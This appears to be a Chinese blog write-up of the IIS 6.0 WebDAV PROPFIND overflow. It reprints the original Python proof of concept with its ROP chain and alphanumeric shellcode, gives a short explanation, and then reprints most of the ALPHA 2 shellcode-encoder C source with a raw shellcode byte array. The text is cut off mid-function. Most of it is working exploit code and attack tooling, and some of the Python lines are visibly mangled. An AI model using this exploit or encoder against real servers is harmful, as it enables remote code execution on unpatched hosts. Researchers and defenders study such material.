IIS/6.0 MS-Author-Via: DAV

原POC：

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.

#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China

#-----------Email: edwardz@foxmail.com

importsocket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.connect(('127.0.0.1',80))

pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'

pay+='If: 

pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'

pay+='>'

pay+=' (Not ) 

pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'

shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'

pay+=shellcode

pay+='>\r\n\r\n'

print pay

sock.send(pay)

data = sock.recv(80960)

print data

sock.close

了解过pwn的都知道从找到溢出到执行shellcode一般需要一段ROP调用链才能跳转到shellcode执行，作者代码中的shellcode变量很明显告诉我门这是关键的执行代码，也就是计算器的执行代码，前面的都是溢出和ROP链的一部分。

而poc中的这段shellcode全部是字母和数字组合，应该是使用了ALPHA系列的shellcode编码器。

找到修改后的ALPHA 2代码如下，可通过vs2015的编译生成exe。

// Alpha2.cpp : Defines the entry point for the console application.

//

#include // printf(), fprintf(), stderr

#include // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()

#include // strcasecmp(), strstr()

#include //struct timeval, struct timezone, gettimeofday()

#include

#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"

#define COPYRIGHT      "Copyright (C) 2003, 2004 by Berend-Jan Wever."

/*

________________________________________________________________________________

,sSSs,,s,  ,sSSSs,  ALPHA 2: Zero-tolerance.

SS"  Y$P"  SY"  ,SY

iS'  dY      ,sS"  Unicode-proof uppercase alphanumeric shellcode encoding.

YS,  dSb    ,sY"      Copyright (C) 2003, 2004 by Berend-Jan Wever.

`"YSS'"S' 'SSSSSSSP 

________________________________________________________________________________

This program is free software; you can redistribute it and/or modify it under

the terms of the GNU General Public License version 2, 1991 as published by

the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT

ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS

FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more

details.

A copy of the GNU General Public License can be found at:

http://www.gnu.org/licenses/gpl.html

or you can write to:

Free Software Foundation, Inc.

59 Temple Place - Suite 330

Boston, MA  02111-1307

USA.

Acknowledgements:

Thanks to rix for his phrack article on aphanumeric shellcode.

Thanks to obscou for his phrack article on unicode-proof shellcode.

Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.

*/

#define mixedcase_w32sehgetpc          "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36"\

"FFFFTXVj0PPTUPPa301089"

#define uppercase_w32sehgetpc          "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYY" \

"P5YYYD5KKYAPTTX638TDDNVDDX4Z4A638618" \

"16"

#define mixedcase_ascii_decoder_body    "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"

#define uppercase_ascii_decoder_body    "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0B" \

"BXP8ACJJI"

#define mixedcase_unicode_decoder_body  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIA" \

"IAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" \

"ZBABABABABkMAGB9u4JB"

#define uppercase_unicode_decoder_body  "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5" \

"AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB" \

"QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB3" \

"0APB944JB"

struct decoder {

char* id; // id of option

char* code; // the decoder

} mixedcase_ascii_decoders[] = {

{ "nops",    "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },

{ "eax",      "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "ecx",      "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "edx",      "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },

{ "ebx",      "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "esp",      "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "ebp",      "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "esi",      "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "edi",      "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp-C]",  "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp-8]",  "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp-4]",  "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp]",    "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp+4]",  "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp+8]",  "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp+C]",  "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },

{ "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },

{ "seh",      mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code

mixedcase_ascii_decoder_body },

{ NULL, NULL }

}, uppercase_ascii_decoders[] = {

{ "nops",    "IIIIIIIIIIII" uppercase_ascii_decoder_body },

{ "eax",      "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "ecx",      "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "edx",      "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },

{ "ebx",      "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "esp",      "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "ebp",      "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "esi",      "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "edi",      "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },

{ "[esp-C]",  "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp-8]",  "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp-4]",  "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp]",    "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp+4]",  "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp+8]",  "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp+C]",  "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },

{ "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },

{ "seh",      uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code

uppercase_ascii_decoder_body },

{ NULL, NULL }

}, mixedcase_ascii_nocompress_decoders[] = {

{ "nops",    "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },

{ "eax",      "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "ecx",      "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "edx",      "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },

{ "ebx",      "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "esp",      "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "ebp",      "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "esi",      "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "edi",      "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp-C]",  "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp-8]",  "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp-4]",  "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp]",    "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+4]",  "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+8]",  "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+C]",  "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },

{ "seh",      mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code

mixedcase_ascii_decoder_body },

{ NULL, NULL }

}, uppercase_ascii_nocompress_decoders[] = {

{ "nops",    "777777777777777777777777" uppercase_ascii_decoder_body },

{ "eax",      "PY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "ecx",      "7777777777777777777777QZ" uppercase_ascii_decoder_body },

{ "edx",      "7777777777777777777777RY" uppercase_ascii_decoder_body },

{ "ebx",      "SY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "esp",      "TY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "ebp",      "UY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "esi",      "VY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "edi",      "WY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },

{ "[esp-C]",  "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },

{ "[esp-8]",  "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp-4]",  "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp]",    "Y777777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+4]",  "YY77777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+8]",  "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+C]",  "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },

{ "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },

{ "seh",      uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code

uppercase_ascii_decoder_body },

{ NULL, NULL }

}, mixedcase_unicode_decoders[] = {

{ "nops",    "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },

{ "eax",      "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "ecx",      "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },

{ "edx",      "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "ebx",      "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "esp",      "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "ebp",      "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "esi",      "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "edi",      "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ "[esp]",    "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },

{ "[esp+4]",  "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },

{ NULL, NULL }

}, uppercase_unicode_decoders[] = {

{ "nops",    "IAIAIAIA4444" uppercase_unicode_decoder_body },

{ "eax",      "PPYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "ecx",      "IAIAIAIA4444" uppercase_unicode_decoder_body },

{ "edx",      "RRYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "ebx",      "SSYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "esp",      "TUYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "ebp",      "UUYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "esi",      "VVYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "edi",      "WWYAIAIAIAIA" uppercase_unicode_decoder_body },

{ "[esp]",    "YAIAIAIAIA44" uppercase_unicode_decoder_body },

{ "[esp+4]",  "YUYAIAIAIAIA" uppercase_unicode_decoder_body },

{ NULL, NULL }

}, mixedcase_unicode_nocompress_decoders[] = {

{ "nops",    "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "eax",      "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "ecx",      "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "edx",      "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "ebx",      "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "esp",      "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "ebp",      "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "esi",      "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "edi",      "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "[esp]",    "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ "[esp+4]",  "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },

{ NULL, NULL }

}, uppercase_unicode_nocompress_decoders[] = {

{ "nops",    "44444444444444" uppercase_unicode_decoder_body },

{ "eax",      "PPYA4444444444" uppercase_unicode_decoder_body },

{ "ecx",      "44444444444444" uppercase_unicode_decoder_body },

{ "edx",      "RRYA4444444444" uppercase_unicode_decoder_body },

{ "ebx",      "SSYA4444444444" uppercase_unicode_decoder_body },

{ "esp",      "TUYA4444444444" uppercase_unicode_decoder_body },

{ "ebp",      "UUYA4444444444" uppercase_unicode_decoder_body },

{ "esi",      "VVYA4444444444" uppercase_unicode_decoder_body },

{ "edi",      "WWYA4444444444" uppercase_unicode_decoder_body },

{ "[esp]",    "YA444444444444" uppercase_unicode_decoder_body },

{ "[esp+4]",  "YUYA4444444444" uppercase_unicode_decoder_body },

{ NULL, NULL }

};

struct decoder* decoders[] = {

mixedcase_ascii_decoders, uppercase_ascii_decoders,

mixedcase_unicode_decoders, uppercase_unicode_decoders,

mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders,

mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders

};

unsigned char evil[] =

"\xda\xd1\xd9\x74\x24\xf4\x58\xba\x05\xf6\xdf\x74\x29\xc9\xb1"

"\x31\x83\xc0\x04\x31\x50\x14\x03\x50\x11\x14\x2a\x88\xf1\x5a"

"\xd5\x71\x01\x3b\x5f\x94\x30\x7b\x3b\xdc\x62\x4b\x4f\xb0\x8e"

"\x20\x1d\x21\x05\x44\x8a\x46\xae\xe3\xec\x69\x2f\x5f\xcc\xe8"

"\xb3\xa2\x01\xcb\x8a\x6c\x54\x0a\xcb\x91\x95\x5e\x84\xde\x08"

"\x4f\xa1\xab\x90\xe4\xf9\x3a\x91\x19\x49\x3c\xb0\x8f\xc2\x67"

"\x12\x31\x07\x1c\x1b\x29\x44\x19\xd5\xc2\xbe\xd5\xe4\x02\x8f"

"\x16\x4a\x6b\x20\xe5\x92\xab\x86\x16\xe1\xc5\xf5\xab\xf2\x11"

"\x84\x77\x76\x82\x2e\xf3\x20\x6e\xcf\xd0\xb7\xe5\xc3\x9d\xbc"

"\xa2\xc7\x20\x10\xd9\xf3\xa9\x97\x0e\x72\xe9\xb3\x8a\xdf\xa9"

"\xda\x8b\x85\x1c\xe2\xcc\x66\xc0\x46\x86\x8a\x15\xfb\xc5\xc0"

"\xe8\x89\x73\xa6\xeb\x91\x7b\x96\x83\xa0\xf0\x79\xd3\x3c\xd3"

"\x3e\x2b\x77\x7e\x16\xa4\xde\xea\x2b\xa9\xe0\xc0\x6f\xd4\x62"

"\xe1\x0f\x23\x7a\x80\x0a\x6f\x3c\x78\x66\xe0\xa9\x7e\xd5\x01"

"\xf8\x1c\xb8\x91\x60\xcd\x5f\x12\x02\x11";

void version(void) {

printf(

"________________________________________________________________________________\n"

"\n"

"    ,sSSs,,s,  ,sSSSs,  " VERSION_STRING "\n"

"  SS\"  Y$P\"  SY\"  ,SY \n"

"  iS'  dY      ,sS\"  Unicode-proof uppercase alphanumeric shellcode encoding.\n"

"  YS,  dSb    ,sY\"      " COPYRIGHT "\n"

"  `\"YSS'\"S' 'SSSSSSSP  \n"

"________________________________________________________________________________\n"

"\n"

);

exit(EXIT_SUCCESS);

}

void help(char* name)

{

printf(

"Usage: %s [OPTION] [BASEADDRESS]\n"

"ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.\n"

"The result can optionaly be uppercase-only and/or unicode proof. It is a encoded\n"

"version of your origional shellcode. It consists of baseaddress-code with some\n"

"padding, a decoder routine and the encoded origional shellcode. This will work\n"

"for any target OS. The resulting shellcode needs to have RWE-access to modify\n"

"it's own code and decode the origional shellcode in memory.\n"

"\n"

"BASEADDRESS\n"

"  The decoder routine needs have it's baseaddress in specified register(s). The\n"

"  baseaddress-code copies the baseaddress from the given register or stack\n"

"  location into the apropriate registers.\n"

"eax, ecx, edx, ecx, esp, ebp, esi, edi\n"

"  Take the baseaddress from the given register. (Unicode baseaddress code using\n"

"  esp will overwrite the byte of memory pointed to by ebp!)\n"

"[esp], [esp-X], [esp+X]\n"

"  Take the baseaddress from the stack.\n"

"seh\n"

"  The windows \"Structured Exception Handler\" (seh) can be used to calculate\n"

"  the baseaddress automatically on win32 systems. This option is not available\n"

"  for unicode-proof shellcodes and the uppercase version isn't 100%% reliable.\n"

"nops\n"

"  No baseaddress-code, just padding.  If you need to get the baseaddress from a\n"

"  source not on the list use this option (combined with --nocompress) and\n"

"  replace the nops with your own code. The ascii decoder needs the baseaddress\n"

"  in registers ecx and edx, the unicode-proof decoder only in ecx.\n"

"-n\n"

"  Do not output a trailing newline after the shellcode.\n"

"--nocompress\n"

"  The baseaddress-code uses \"dec\"-instructions to lower the required padding\n"

"  length. The unicode-proof code will overwrite some bytes in front of the\n"

"  shellcode as a result. Use this option if you do not want the \"dec\"-s.\n"

"--unicode\n"

"  Make shellcode unicode-proof. This means it will only work when it gets\n"

"  converted to unicode (inserting a '0' after each byte) before it gets\n"

"  executed.\n"

"--uppercase\n"

"  Make shellcode 100%% uppercase characters, uses a few more bytes then\n"

"  mixedcase shellcodes.\n"

"--sources\n"

"  Output a list of BASEADDRESS options for the given combination of --uppercase\n"

"  and --unicode.\n"

"--help\n"

"  Display this help and exit\n"

"--version\n"

"  Output version information and exit\n"

"\n"

"See the source-files for further details and copying conditions. There is NO\n"

"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"

"\n"

"Acknowledgements:\n"

"  Thanks to rix for his phrack article on aphanumeric shellcode.\n"

"  Thanks to obscou for his phrack article on unicode-proof shellcode.\n"

"  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.\n"

"\n"

"Report bugs to \n",

name

);

exit(EXIT_SUCCESS);

}

//-----------------------------------------------------------------------------

int main(int argc, char* argv[], char* envp[])

{

int  uppercase = 0, unicode = 0, sources = 0, w32sehgetpc = 0,

nonewline = 0, nocompress = 0, options = 0, spaces = 0;

char* baseaddress = NULL;

int  i, input, A, B, C, D, E, F;

char* valid_chars;

// Random seed

//struct timeval tv;

//struct timezone tz;

//ttimeofday(&tv, &tz);

//srand((int)tv.tv_sec*1000+tv.tv_usec);

// Scan all the options and set internal variables accordingly

for (i=1; i

{

if (strcmp(argv[i], "--help") == 0) help(argv[0]);

else if (strcmp(argv[i], "--version") == 0) version();

else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;

else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;

